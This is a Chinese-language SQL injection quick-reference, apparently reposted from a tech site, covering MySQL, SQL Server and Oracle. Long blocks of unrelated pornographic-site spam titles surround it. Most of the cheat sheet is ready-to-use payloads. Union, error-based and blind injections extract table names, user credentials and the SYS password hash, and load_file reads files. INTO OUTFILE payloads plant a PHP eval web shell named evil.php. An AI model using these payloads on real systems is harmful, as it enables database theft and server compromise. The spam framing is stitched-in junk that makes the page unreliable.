精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

SQL注入速查筆記

運維 數據庫運維
Mysql劃分:權限 root 普通用戶 版本 mysql>5.0 mysql<5.0。

 [[348344]]

0x01 Mysql

Mysql劃分:權限 root 普通用戶 版本 mysql>5.0 mysql<5.0

1.1 root權限

load_file和into outfile用戶必須有FILE權限,并且還需要知道網站的絕對路徑

判斷是否具有讀寫權限

  1. and (select count(*) from mysql.user)>0# 
  2. and (select count(file_priv) from mysql.user)># 

A、Load_file() 該函數用來讀取源文件的函數,只能讀取絕對路徑的網頁文件

注意:路徑符號”\”錯誤 “\”正確 “/”正確,轉換成十六進制,不用“”

  1. id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(’/var/www/index.php’)(物理路徑轉16進制) 

可以用來讀取數據庫連接文件獲取數據連接賬號、密碼等

  1. ?id=1'and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php')%23 
  2. id=1'and 1=2 union select 1,load_file(0x443A2F77616D702F7777772F312E706870)%23 

B、into outfile函數

條件:1. 絕對路徑 2.可以使用單引號

  1. ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php' 
  2. ?id=1 LIMIT 0,1 INTO OUTFILE 'E:/s 
  3. tudy/WWW/evil.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 -- 

1.2 MySQL聯合查詢

1.2.1 適用于mysql低于5.0版本

  1. 1.判斷是否可以注入 
  2.     ?id=1 and 1=1,頁面正常 
  3.     ?id=1 and 1=2,頁面空白 
  4. 2.獲得字段數 
  5. order by的方法來判斷,比如: 
  6.     ?id=1 order by 4   頁面顯示正常 
  7.     ?id=1 order by 5   頁面出錯,說明字段數等于4 
  8. 3.獲得顯示位 
  9.     ?id=1 and 1=2 union select 1,2,3,4  
  10.     //比如,頁面上出現了幾個數字,分別是2,3,4,那么,這幾個數字就被我們稱作顯示位。 
  11. 4.猜表名 
  12.     猜表名的方法是,在第三步的完整的地址后加上:Form 表名,比如: 
  13.         ?id=1 and 1=2 union select 1,2,3,4 from users 
  14.     這樣,當users表存在的話,頁面就會顯示正常,如果我們提交一個不存在的表名,頁面就會出錯。 
  15.  
  16. 5.猜字段 
  17.     使用:Concat(字段名)替換顯示位的位置。 
  18.         ?id=1 and 1=2 union select 1,2,3,concat(username,passwordfrom users 

1.2.2 適用于Mysql 5.0以上版本支持查表查列

  1. 1.先判斷是否可以注入 
  2.     and+1=1,頁面正常 
  3.     and+1=2,頁面空白 
  4. 2.獲得字段數:使用order by 
  5. 提交: 
  6.     ?id=1 order by 4 正確。 
  7.     ?id=1 order by 5 錯誤。 
  8.     那么,判斷出字段數為4。 
  9. 3.獲得顯示位 
  10.  
  11. 提交:?id=1 +and+1=2+union+select+1,2,3,4 
  12. 顯示位為:2,3,4 
  13. 4.獲取信息 
  14.     ?id=1 +and+1=2+union+select+1,2,3,version() 
  15.  
  16.     database()  
  17.     user()   
  18.     version()  
  19.     database()   
  20.     @@basedir  數據庫安裝路徑 
  21.     @@datadir  數據庫路徑 
  22. 5.查表 
  23. ?id=1 and 1=2 union select 1,2,3,table_name from information_schema.tables where table_schema=0x74657374(數據庫名test的Hex) limit 0,1-- 
  24. 得到表:test 
  25.  
  26. 6.查字段 
  27.     ?id=1 and 1=2 union select 1,2,3,column_name from  
  28. information_schema.columns where table_name=0x74657374 limit 0,1-- 
  29.     得到字段:id,username,password 
  30. 7.爆字段內容 
  31.     ?id=1+and+1=2+union+select+1,2,3,concat(username,passwordfrom+test 

1.3 MySQL報錯注入

mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。

多種報錯注入方式:

  1. and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a); 
  2. and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 
  3. and extractvalue(1, concat(0x5c, (select VERSION() from information_schema.tables limit 1))) 
  4. and 1=(updatexml(1,concat(0x3a,(select user())),1)) 
  5. and GeometryCollection((select*from(select*from(select @@version)f)x)) 
  6. and polygon((select*from(select name_const(version(),1))x)) 
  7. and linestring((select * from(select * from(select user())a)b)) 
  8. and multilinestring((select * from(select * from(select version())a)b)); 
  9. and multipoint((select * from(select * from(select user())a)b)); 
  10. and multipolygon((select * from(select * from(select user())a)b)); 
  11. and exp(~(select * from(select version())a)); 

1.4 MySQL盲注

基于布爾型注入

  1. id=1 and (select length(user()))=20 # 返回正常頁面  長度20位 
  2. id=1 and ascii(substring((SELECT username FROM users limit 0,1),1,1))=97 
  3. //截取username第一個數據的ascii值 

基于時間型注入

  1. 1 xor (if(ascii(mid(user()from(1)for(1)))='r',sleep(5),0)) 
  2. 1 xor if(ascii(substr(user(),1,1)) like 1124,benchmark(1000000, md5('1')),'2'

0x02 SQLServer

SA權限:數據庫操作,文件管理,命令執行,注冊表讀取等

Db權限:文件管理,數據庫操作等

Public權限:數據庫操作

2.1 SQLServer 聯合查詢

  1. 1.判斷是否存在注入 
  2.     ?id=1 and 1=1--  返回正確 
  3.     ?id=1 and 1=2--  返回錯誤 
  4.  
  5. 2.獲取字段數 
  6.     ?id=1 order by 2-- 返回正確頁面   
  7.     ?id=1 order by 3-- 返回錯誤頁面    字段長度為2 
  8.  
  9. 3.查看數據庫版本 
  10.     ?id=1 and 1=2 union select  db_name(),null   //獲得當前數據庫 
  11.  
  12. 4.查看表名 
  13.     ?id=1 and 1=2 union select  top 1  TABLE_NAME ,2 from INFORMATION_SCHEMA.TABLES where table_name not in ('users')  
  14.  
  15. 5.查看列名 
  16.     ?id=1 and 1=2 union select  top 1 column_name ,2  from  information_schema.columns where table_name ='users'  and column_name not in ('uname'
  17.  
  18. 6.獲取數據 
  19.     ?id=1 and 1=2 union select top 1 uname,null from users 

2.2 SQLServer 報錯注入

  1. 1.獲取表名 
  2. ?id=4' and 1>(select top 1  TABLE_NAME from INFORMATION_SCHEMA.TABLES  where TABLE_NAME not in ('admin') )-- 
  3. 2.獲取列名 
  4. ?id=4' and 1>(select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin' and column_name not in ('id')) -- 
  5.  
  6. 3.獲取數據 
  7. ?id=4' and 1=(select top 1 pwd from admin) -- 
  8.  
  9. 4.獲取數據庫信息 
  10. ?id=1' and 1=(select @@version)--   //SQL Server 2000 
  11. ?id=1' and 1=(select db_name())  //當前使用的數據庫 

2.3 SQLServer 盲注

  1. 1、猜表名 
  2.  
  3. ?id=1 and  (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u'and len(name)=7)=1 --  //獲取第一個表的長度7 
  4.  
  5. ?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u'and ascii(substring(name,1,1))=116)=1 --    //截取第一個表第一位的ascii碼 
  6.  
  7. ?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))>115)=1 --//猜第二個表的第一位ASCII值 
  8. 得到表名,進一步猜解字段 
  9.  
  10. 2、猜字段 
  11. id=1 and  
  12. (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users')) and ascii(substring(name,1,1))=117)=1  
  13. //獲取users表第一個字段的ASCII值 
  14.  
  15. id=1 and  
  16. (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users') ) and name not in ('upass')  and ascii(substring(name,1,1))>90)=1  -- 
  17. //獲取user表第二個字段的第一位ASCII值 
  18.  
  19. 3、猜數據 
  20. id=1 and (ascii(substring((select top 1 uname from users),1,1)))=33 --   
  21. //獲取users表中uname字段的第一位ASCII值 

0x03 Oracle

3.1 聯合查詢

  1. Union select null,null,null   從第一個null開始加’null’,得到顯示位 
  2. Union select null,null,null from dual  返回正確,存在dual表 
  3. Union Select tablespace_name from user_tablespaces    //查庫 
  4. Union Select table_name from user_tables where rownum = 1 and table_name<>’news’  //查表 
  5. Union Select column_name from user_tab_columns where table_name=’users’  //查列 
  6. ?id=1 order by 1-- //獲取字段數 
  7. and+1=1+union+all+select+(SELECT banner FROM v$version where rownum=1)+from+dual--//獲取數據庫版本 
  8. and+1=1+union+all+select+(select user from dual where rownum=1)+from+dual-- //獲取當前連接數據庫的用戶名 
  9. union+all+select+(select password from sys.userwhere rownum=1 and name='SYS')+from+dual-- -- //獲取用戶SYS密文密碼 
  10. union+all+select+(SELECT name FROM v$database)+from+dual-- //獲取庫名 
  11. and+1=1+union+all+select+(select table_name from user_tables where rownum=1)+from+dual--//獲取第一個表名 

3.2 手工顯錯注入

  1. 最大的區別就是utl_inaddr.get_host_address這個函數,10g可以調用,11g需要dba高權限 
  2.  
  3. //判斷是否是oracle 
  4. ?id=1 and exists(select * from dual)-- 
  5.  //獲取庫名 
  6. ?id=1 and 1=utl_inaddr.get_host_address((SELECT name FROM v$database))—- 
  7. //獲取數據庫服務器所在ip 
  8. ?id=1 and 1=ctxsys.drithsx.sn(1,(select UTL_INADDR.get_host_address from dual where rownum=1))--  
  9. ?id=1 and 1= CTXSYS.CTX_QUERY.CHK_XPATH((select banner from v$version where rownum=1),'a','b')-- 
  10. ?id=1 or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),'a','b')-- 
  11. ?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null -- 
  12. ?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))-- 

3.3 盲注

基于布爾類型的盲注:

  1. ?id=7782' and length((SELECT name FROM v$database))=4--  獲取數據庫名長度 
  2. ?id=7782'  and ascii(substr((SELECT name FROM v$database),1,1))=79--  
  3. 獲取數據庫名第一位為O 

基于時間延遲的盲注:

  1. ?id=7782' and 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN 1 ELSE 2 END)-- 
  2. ?id=7782'  AND 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(103)||CHR(102)||CHR(102),5) ELSE 1 END)-- 

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2013-05-02 15:09:22

2010-12-20 16:04:30

2017-08-10 10:23:59

2010-04-13 14:35:17

2020-09-28 09:30:13

mybatis

2010-09-27 11:17:31

2011-10-19 10:47:56

2020-12-16 13:22:37

Web安全SQL工具

2014-11-04 13:43:10

2009-02-04 16:51:48

2020-08-07 08:13:08

SQL攻擊模式

2009-07-24 16:59:57

iBatis模糊查詢

2009-10-25 13:32:09

2009-11-02 13:47:09

2021-09-16 09:05:45

SQL注入漏洞網絡攻擊

2019-02-22 09:00:00

2016-09-06 13:40:20

2010-10-22 15:18:18

SQL注入漏洞

2015-08-26 11:12:11

數據溢出SQL注入SQL報錯注入

2009-02-04 16:11:45

點贊
收藏

51CTO技術棧公眾號

青青青视频在线播放| 亚洲小说欧美另类激情| 五月天激情四射| 精品国精品国产自在久国产应用 | www亚洲视频| 999国产精品| 日韩国产高清视频在线| 波多野结衣国产精品| 77thz桃花论族在线观看| 国产性天天综合网| 国产精品对白刺激久久久| 无码人妻av一区二区三区波多野| 你懂的一区二区| 亚洲性线免费观看视频成熟| 亚洲黄色小说在线观看| 粉嫩av一区二区三区四区五区| 亚洲高清视频中文字幕| 一本一本久久a久久精品综合妖精| 日本黄色大片视频| 久久av资源站| 国产成人涩涩涩视频在线观看| 欧美精品久久久久性色| 久久精品国产www456c0m| 亚洲女人天堂av| 午夜福利三级理论电影| 91精品网站在线观看| 91黄色免费看| 成年人观看网站| 日本高清成人vr专区| 国产精品欧美久久久久一区二区| 久久精品99久久| 成人av无码一区二区三区| 捆绑调教一区二区三区| 国产精品国模在线| 亚洲成人第一网站| 美女久久一区| 国产一区二区精品在线观看| 日韩在线观看免费网站 | 国产无人区一区二区三区| 国产欧美一区二区视频| 成人1区2区3区| 国产精品99久久久久久宅男| 国产视频福利一区| 中文字幕在线网址| 美女免费视频一区二区| 国产精品av网站| 波多野结衣小视频| 日韩精品色哟哟| 国产精品v片在线观看不卡| 一级片免费在线播放| 丝袜美腿亚洲一区| 国产精品99久久久久久白浆小说| 黄色免费av网站| 国产精品日韩| 欧美中文字幕视频在线观看| 久久国产视频精品| 日韩高清一区在线| 国产精品丝袜白浆摸在线| 一级片在线观看视频| 精东粉嫩av免费一区二区三区| 成人h视频在线| 国产精品国产三级国产aⅴ| 精品一区二区免费在线观看| 成人黄色在线播放| a在线观看视频| 成人精品视频一区二区三区| 精品999在线观看| 你懂的视频在线| 中文字幕乱码一区二区免费| 亚洲人成人77777线观看| 国产在线观看免费麻豆| 亚洲丶国产丶欧美一区二区三区| 国产视频九色蝌蚪| 台湾佬中文娱乐久久久| 在线成人高清不卡| 任你躁av一区二区三区| 亚洲精品进入| 综合国产在线观看| 男女性高潮免费网站| 亚洲精品系列| 国产精品欧美一区二区三区奶水| 国产一区二区在线视频观看| 成人av在线播放网址| 欧美三级电影在线播放| 乱人伦中文视频在线| 亚洲综合色成人| 国内外免费激情视频| 四虎精品永久免费| 亚洲国产精品大全| 变态另类ts人妖一区二区| 一区二区中文字| 538国产精品视频一区二区| 中文字幕在线播放av| 国产成人精品亚洲777人妖| 国产欧美一区二区三区另类精品| 成在在线免费视频| 亚洲一区影音先锋| 欧美黑人又粗又大又爽免费| 麻豆一区在线| 国产亚洲精品久久久久动| 青春草免费视频| 秋霞成人午夜伦在线观看| 国产成人女人毛片视频在线| 国产人成在线观看| 亚洲午夜精品一区二区三区他趣| 爱情岛论坛亚洲首页入口章节| 中文一区二区三区四区| 在线视频中文亚洲| 波多野结衣国产| 国产精品一区二区91| 亚洲成人蜜桃| 九九色在线视频| 欧美日韩在线三级| 日本xxxx裸体xxxx| 伊人影院久久| 91欧美激情另类亚洲| 国产在线观看精品一区| 亚洲国产成人精品视频| 久久精品视频在线观看免费| 国产精品美女久久久久久不卡 | 中文字幕一区二区三区四区五区人| 久草免费在线视频| 日韩久久免费av| 日本黄色片免费观看| 日韩高清国产一区在线| 麻豆成人小视频| aa视频在线观看| 日韩一卡二卡三卡| 91插插插插插插| 精品一区二区在线视频| 亚洲丰满在线| 91tv亚洲精品香蕉国产一区| 国产午夜精品麻豆| 五月婷婷亚洲综合| 91麻豆精品在线观看| 北条麻妃在线视频观看| 久久av国产紧身裤| 午夜精品福利视频| 性生交大片免费看女人按摩| 综合久久国产九一剧情麻豆| 15—17女人毛片| 精品一区二区三区在线| 国产精品第一区| 国产黄色在线播放| 欧美在线free| 成人精品一二三区| 久久精品国产**网站演员| 亚洲精品一区二区三区av| 日韩一区二区三区在线免费观看 | xxxxx在线观看| 免费永久网站黄欧美| 欧美xxxx黑人又粗又长密月| 亚洲精品中文字幕| 亚洲小视频在线观看| 最近中文字幕av| 国产精品大尺度| 中文字幕第三区| 欧美日韩日本国产亚洲在线| 国产精品久久久久久久久久直播 | 国产在线观看精品| 久草免费在线| 精品日韩av一区二区| 日韩欧美性视频| 久久久777精品电影网影网| 亚洲五月天综合| 亚洲精品久久久| 激情小说综合网| 亚洲成人av观看| 久久综合久久美利坚合众国| 亚洲黄色a级片| 高潮白浆女日韩av免费看| 国产一二三四五区| 狠狠色丁香婷婷综合| 91午夜在线观看| 久久av影视| 95av在线视频| 涩涩视频在线| 在线丨暗呦小u女国产精品| 国产三级在线观看视频| 狠狠色狠狠色综合日日小说| 一区二区三区在线观看免费视频| 国产精品123区| 真人抽搐一进一出视频| 欧美一区二区麻豆红桃视频| 91久久中文字幕| 涩涩涩在线视频| www.日韩av.com| 亚洲欧美一区二区三| 欧美色精品在线视频| 欧美成人片在线观看| 久久精品亚洲一区二区三区浴池| 天堂av手机在线| 一区二区三区精品视频在线观看| 亚洲午夜精品久久| 日韩高清三区| 亚洲aⅴ男人的天堂在线观看| 黄色污网站在线观看| x99av成人免费| 亚洲 小说区 图片区 都市| 7777精品伊人久久久大香线蕉的| 久草视频在线观| 亚洲精品中文字幕乱码三区 | 人妻无码中文字幕| 欧美午夜在线一二页| 亚洲欧美在线观看视频| 国产精品国产三级国产a| 成人手机在线免费视频| 国产精品自在在线| 青青青在线视频免费观看| 亚洲小说欧美另类社区| 无码人妻精品一区二区三区99v| 亚洲系列另类av| 国产精品成人观看视频免费| 91国产一区| 国产日韩欧美中文| 性高爱久久久久久久久| 久久露脸国产精品| 日韩av激情| 欧美成人免费一级人片100| av片在线看| 亚洲天堂视频在线观看| 午夜18视频在线观看| 日韩精品中文字幕在线不卡尤物| 中文字幕在线视频免费| 在线观看视频一区二区欧美日韩| 国产成人无码精品| 亚洲一二三四区| 激情五月婷婷小说| 亚洲女与黑人做爰| 97成人资源站| 国产精品家庭影院| 久久久免费看片| 国产区在线观看成人精品| 国产黄色三级网站| 成人免费看的视频| 9.1在线观看免费| 成人性生交大合| 亚洲美女精品视频| 国产成人在线观看| 黑人性生活视频| 国产精品综合网| 美女日批在线观看| 国产精品中文字幕一区二区三区| 成人免费黄色av| 国产美女视频91| 手机看片国产精品| 国产不卡高清在线观看视频| 亚洲精品一区二区18漫画| 豆国产96在线|亚洲| 日本人妻一区二区三区| 成人爱爱电影网址| 精品国产一区在线| 2021中文字幕一区亚洲| av黄色在线免费观看| 中文字幕不卡一区| 可以免费看av的网址| 亚洲三级视频在线观看| 久草免费在线视频观看| 亚洲大片在线观看| 国产精品人人人人| 在线观看一区不卡| 国产精品熟女久久久久久| 欧美一二三区在线观看| 日本波多野结衣在线| 亚洲色图17p| 欧美激情免费| 国产做受高潮69| 樱花草涩涩www在线播放| 国产激情久久久| 成人乱码手机视频| 精品国产一二| 欧美第十八页| 天天做天天躁天天躁| 午夜一区在线| 亚洲日本黄色片| 成人国产一区二区三区精品| 90岁老太婆乱淫| 亚洲免费观看高清完整版在线观看 | 嫩草一区二区三区| 亚洲在线色站| 亚洲激情成人| 国产 porn| 国产成人av电影免费在线观看| 亚洲乱码国产乱码精品精大量| 一区在线不卡| 日韩欧美中文字幕制服| 亚洲三区在线播放| 久久精品成人欧美大片古装| 91资源在线观看| 国产伦精品一区二区三区精品视频| 日韩精品视频在线看| 奇米影视首页 狠狠色丁香婷婷久久综合| 日韩免费特黄一二三区| 国产情侣第一页| 免费av网站大全久久| 少妇熟女视频一区二区三区 | 日本激情视频一区二区三区| 亚洲成av人片www| 91精品国自产| 亚洲美女黄色片| 成人性生交大片免费看网站| 国产精品久久久久久久久久99| 亚洲国产aⅴ精品一区二区| 日韩一区免费观看| 亚洲在线电影| 精品无码av一区二区三区| 国产精品久久久久久久第一福利| 日韩三级av在线| 欧美一区二区三区的| 国产高清美女一级毛片久久| 午夜精品99久久免费| 国产精品一区二区精品| 亚洲成人在线视频网站| 99热免费精品在线观看| 色婷婷狠狠18禁久久| 国产精品成人网| 天天综合久久综合| 精品视频久久久久久久| 免费污视频在线| 亚洲已满18点击进入在线看片 | 国产又大又长又粗又黄| 三级在线观看一区二区| 黄色性生活一级片| 午夜精品福利一区二区三区av| 国产精品欧美久久久久天天影视| 亚洲欧美综合v| 在线男人天堂| 久久国产精品久久精品国产| 黄色av日韩| 涩视频在线观看| 亚洲亚洲精品在线观看| www.天堂av.com| 精品中文字幕在线观看| 国产精品亚洲综合在线观看| 波多野结衣三级在线| 久久99国产精品麻豆| 亚洲色图 激情小说| 欧美亚洲动漫精品| 成人欧美一区| 国产精品国产自产拍高清av水多| 亚洲精华一区二区三区| www.亚洲天堂网| 2022国产精品视频| 激情视频网站在线观看| 亚洲欧美日韩久久久久久| 婷婷六月国产精品久久不卡| 日本一区二区三区视频在线播放| 久久中文在线| 夫妇露脸对白88av| 69精品人人人人| 宅男网站在线免费观看| 99久久久久国产精品免费| 欧美性久久久| 在线天堂www在线国语对白| 欧美日韩午夜剧场| 激情小说 在线视频| 国产欧美日韩综合精品| 91精品国产乱码久久久久久久| 51自拍视频在线观看| 亚洲线精品一区二区三区 | 成年永久一区二区三区免费视频| 国产高清精品软男同| 懂色av一区二区三区免费看| 国产精品免费av一区二区| 亚洲丝袜av一区| 天堂综合在线播放| 91.com在线| 久久精品一区二区三区四区| 亚洲在线视频播放| 九九视频这里只有精品| 露出调教综合另类| 免费看黄色一级大片| 亚洲天堂成人网| 天天av天天翘| 国产精品一久久香蕉国产线看观看| 亚洲欧洲日韩| 在线观看国产网站| 欧美日韩国产一级片| 欧美寡妇性猛交xxx免费| 蜜桃视频在线观看成人| 国产又粗又猛又爽又黄91精品| 国产在线观看免费视频今夜| 一区二区三区久久精品| 日韩精品视频中文字幕| 久久久久久久久久久久久国产精品| 国产精品久线在线观看| 欧美一区二区在线观看视频| 国产精品96久久久久久又黄又硬 | 国产午夜亚洲精品羞羞网站| 国产乱子伦精品无码码专区| 97在线观看免费高清| 天天综合久久| 精品少妇一区二区三区免费观| 91精品国产91久久久久久一区二区 | 日批视频免费播放| 国产免费观看久久黄| 国产精品久久久久久久久久妞妞| 欧美黄色aaa| 一本色道久久88精品综合| xxxx日韩|